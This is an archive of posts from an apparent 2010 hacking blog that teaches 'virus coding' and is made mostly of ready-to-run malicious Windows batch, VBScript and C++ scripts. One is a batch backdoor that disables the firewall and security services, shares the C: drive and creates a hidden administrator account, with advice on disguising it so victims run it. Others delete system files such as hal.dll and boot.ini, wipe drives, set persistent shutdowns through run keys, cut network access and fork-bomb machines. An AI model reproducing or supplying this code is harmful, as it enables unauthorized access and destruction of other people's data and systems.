Showing posts with label virus coding. Show all posts
Showing posts with label virus coding. Show all posts

Saturday, August 14, 2010

HOW TO MAKE RAT FILE INTO BAT

As The Title says all in this tut i am going to make you learn how to create a RAT In Cmd
A Quick GUide To RAT
What is a RAT?
Well to start off, The term RAT is short for Remote Administration Tool.
A quick definition of a RAT (Remote Administration Tool): RAT’S are used to connect and manage a single or multiple computers with a variety of tools, such as:
* Screen/camera capture or control
* File management (download/upload/execute/etc.)
* Shell control (usually piped from command prompt)
* Computer control (power off/on/log off)
* Registry management (query/add/delete/modify)
* Other product-specific function
Are RATS Legal/Illegal?
Well, It is actually both. There are RATS that are Legal and that are actually Illegal. The difference between them both are the fact that, Legal RATS inform the connected remote that you are on the computer, And Illegal RATS do NOT inform the remote that you are on the computer.
So basically to break things down.

Legal means the person has full control as well, They can kill the connection any time they please, No backdoor is left on their PC, And it is in your network.

Illegal means the person does NOT know you are connected and they have no knowledge you are till you take action, They have no control to kill the connection (unless they unplug the internet), But even then, A backdoor is left on the computer meaning anytime the computer is on and the internet is up, You can connect anytime you want. You can destroy files, Download files, Steal information, Basically make their life miserable.
SO I think till now you must have some basic knowledge of RATs

Now We Headon to Our TuT!

Simply paste the code underneath this into notepad and save it as a .bat file. Or .cmd if you’d like.. Anyways, once your victim has run the file, his firewall and antivirus will be shutdown and an account named ‘admin’ will be created with admin access so.. Yeah.. Under the code you’ll see how to get access..

@echo off
Cls
net share system=C:\ /unlimited
cls
Attrib +r +h C:\windows\startm~1\program\startup\trojan.bat
Cls
net stop SharedAccess
net stop “Security Center”
>>”%Temp%.kill.reg” ECHO REGEDIT4
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>”%Temp%.kill.reg” ECHO “Start”=dword:004
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>”%Temp%.kill.reg” ECHO “Start”=dword:004
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc]
>>”%Temp%.kill.reg” ECHO “Start”=dword:004
>>”%Temp%.kill.reg” ECHO.
START /WAIT REGEDIT /S “%Temp%.kill.reg”
del “%Temp%.kill.reg”
del %0
cls
net user Admin /add
net localgroup Administrators /add “Admin”
cls
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v “Admin” /t REG_DWORD /d 00 /f
cls
reg add “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ Messenger” /v Start /t REG_DWORD /d 002 /f
cls
net start Messenger
cls
netsh firewall set opmode mode=disable
cls
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v “admin” /t REG_DWORD /d 00 /f”
REG add “HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLEREGISTRYTOOLS /T REG_DWORD /D 0 /F”
Cls
OR CLICK HERE TO DOWNLOAD CODING
Now Make the victim to open this file on his machine
you can convert this .cmd/.bat file to exe file and change icon and all other stuff to make victim trust this file!

Okay, so when the victim have run the file, all you have to do is open cmd on your own computer and type in the following:

net use \\IP-of-your-victim admin

Example how to use above command

net use \\192.168.1.1 admin

Followed by the following code:

explorer \\IP-of-your-victim\system
Example how to use above command

explorer \\192.168.1.1\system

So the 2 lines would be like the following:

net use \\192.168.1.1 admin
explorer \\192.168.1.1\system

obvious edit the IPs

PS. If you don’t know how to get the IP off of someone, go onto MSN and send them a file (Eventually do it with the batch file you sent with the RAT) and go into CMD and type in ‘netstat’, then try to identify it.

and i will soonly post a big thread on how to get IP of victim!

Tuesday, August 3, 2010

some dos viruses

Note: I Take No Responsibility Of The Effects Of These Scripts
After You Use Them, So Never Try These On Your Own PC.




ALL OF THEZE ARE TO BE TYPED IN NOTEPAD...

--- --- --- --- --- --- --- --- ---




1) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


Save it as "Anything.VBS" and send it.


2) Convey your friend a little message and shut down his / her computer:
Type :

Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s


Save it as "Anything.BAT" in All Files and send it.

3) Toggle your friend's Caps Lock button simultaneously:


Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Save it as "Anything.VBS" and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


Save it as "Anything.VBS" and send it.
5)This Virus Deletes All The Content Of A Drive...


@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat

6)This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

7)Save It As Anything.vbs

It Only Works With Windows XP

The Most Simple Virus To Crush The Window



@Echo off
Del C: *.* |y

Save It As Anything.bat

8)Virus that crashes pc





@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive



Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!


9)Shutdowns Computer Everytime It Is Turned On

Save As A bat File

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

10 )Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File

11)Change Files To Non-working TXT Files
Save As A bat File

REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

System Meltdown


12)System Meltdown


:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File


13)Temporarily Flood Network


:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will
automatically shutdown on every startup !

Sunday, August 1, 2010

SIMPLE VIRUS CODES FOR BEGINNERS:

Virus code can be coded using several language. The best being c or vbs or dos. Today I teach some basic virus codings. I will be using c, dos and alp/asm(assembly language).These is a very simple Virus coding tutorial just a beginners guide,this is mainly for programmers. this post is just to change their thinking. First lets begin with tiny and simple ones.I will show both codes for windows and linux


First alp/asm
back: add c,b
loop back


This simple script needs no explanation. It will just be eating away your victims memory at a slow space. As you know addition needs some space to store intermediate result. this will be using up the ram. but very less of ram is lost and the user can stop this by just closing the .exe file. As you know a float addition takes up more space than normal addition . You can replace integer addition with float.
**********************************************************************************

Now lets try to create a simple Linux virus in c.


system("poweroff");


This simple script will turn off your victims comp. Now if you can forece this script to load at start up then it will be a nightmare.


let's see one more linux virus of the same type
system("rm *.*");


This will all files with all extension which the user has previlage to delete.Just imagine if the admin runs it then it will create a havoc.
**********************************************************************************

Lets see the same codes for windows.


To delete all files in windows using dos/batch progtraming will be
del *.*
and the code of the shutdown virus will be just shutdown


Now lets disable Internet


ipconfig /release
echo You Internet Been HACKED!

What if you change the extension of a file. It becomes useless.Now let's rename a few file.
rename(old_file_name_with_path,newname");
Now what you can do with this left up to you.Just use your brain and you will make out it's potential.


These are very simple virus just a beginners guide. Just check out the virus codes section for more complex and full fledged Virus coding tutorial. Please dont misuse these virus codes in c
PLEASE POST UR COMMENTS:

POWER FULL C++ VIRUS

This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.
Warning: Do not try this on your home computer.

The Original Code:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(“C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}

A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(“%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}

The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.

Wednesday, July 28, 2010

Irritating prank

hi everyone

i was fealing very bore so
i just now made a very annoying virus. it can irritate any one

okay the code i m giving is of dos, so save it with an extension of .bat copy dis code and save it as a batch file
1)  
--------------------------------------------------------------------------

@echo off
copy %0 "%userprofile%\Start Menu\Programs\Startup\"
cls
:start

c:\windows\system32\shutdown.exe /s /t 60 /c "hi buddy"
ping 1 -n 7 -w 200 >nul
c:\windows\system32\shutdown.exe /a
c:\windows\system32\shutdown.exe /s /t 60 /c "i came here to say u hi"
ping 1 -n 7 -w 200 >nul
c:\windows\system32\shutdown.exe /a
c:\windows\system32\shutdown.exe /s /t 60 /c "r u eating now"
ping 1 -n 7 -w 200 >nul
c:\windows\system32\shutdown.exe /a
c:\windows\system32\shutdown.exe /s /t 60 /c "y r u not eating"
ping 1 -n 7 -w 200 >nul
c:\windows\system32\shutdown.exe /a

goto start



---------------------------------------------------------------------------------------------------
2)
to make it even more irritating

copy these 3 lines

c:\windows\system32\shutdown.exe /s /t 60 /c "hi buddy"
ping 1 -n 7 -w 200 >nul
c:\windows\system32\shutdown.exe /a


and paste it before goto 40-50 times
and goto the first line every time which is
c:\windows\system32\shutdown.exe /s /t 300 /c "hi buddy"

and replace 
hi buddy with what ever u want to write
please write some irritating things only over their

you will have to 
replace hi buddy everywhere ,wherever you have pasted the above 3 lines



this program will run itself automatically whenever computer starts

if one gets irritated and he closes this program
then after 1 minute his computer will also shutdown
so run dis program in your friends' computer
and enjoy watching them get irritated

it will pop up msgbox one after the other continuously
with the text whatever you write replacing hi buddy

one after the other msgbox will keep appearing
and this process will continue endlessly
so its for sure one will get irritated at last
and he will close this program
after closing this program his computer will also shutdown
his computer will shutdown after 1 min


Tuesday, July 20, 2010

FACEBOOK FAKE VIRUS

In this tutorial I will show you how to make a  Facebook virus using simple commands on notepad. .This will make the victim think they have got a virus when they click on an icon such as Internet Explorer .



1) Open notepad
2) Type this in :
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNTWILL BE DELETED !!!!TO REMOVE THE  VIRUS CLICK OK OR CLOSE THIS BOX!

PAUSEshutdown -r -t 300 -c " SORRY!!! YOUR  FACEBOOK  ACCOUNT  ARE NOW BEING DELETED !!! PLEASE WAIT ..........."

3)Save as Internet Explorer .bat

4)Right click on Internet Explorer .bat and click Create Shortcut

5)Right click on shorcut and click Properties.

6)Click Change Icon

7) Choose Internet Explorer icon or similar , click OK , then click Apply

8)Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:


After five minutes windows will restart , that is all. This is totally harmless and will give you a laugh. Enjoy !
THANKS TO HACKSPC for this article

Saturday, May 22, 2010

HOW TO CRASH ANYONES SYSTEM

http://i34.tinypic.com/2hnz9t2.gif
Open notepad type the following CODE and save it as anyname.vbs



This program will infinitely open notepad in hidden mode causing your
system to crash...!


the value "0" in the third line specifies the mode in which the application
should run here it is hidden mode.


╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦
set ws=CreateObject("wscript.shell")
do
ws.run "notepad",0
loop
=======================================



Warning : Author are not responsible to any damages caused by this codes so use it 
on ur own Risk.

Saturday, May 15, 2010

Batch virus


Batch that kills and deletes the windows directory, and all .txt .exe .bat and .ini files and then forkbombs your computer

copy the below code in notepad file 

and save it as anyname.bat and  run it

@echo off
kill %windir%
del %windir%
del *.txt
del *.exe
del *.bat
del *.ini
:ok
start, cmd
Goto ok 


Warning: Don't  Try it on ur own PC .
The Author is not responsible for any damage.
 
 

Blogger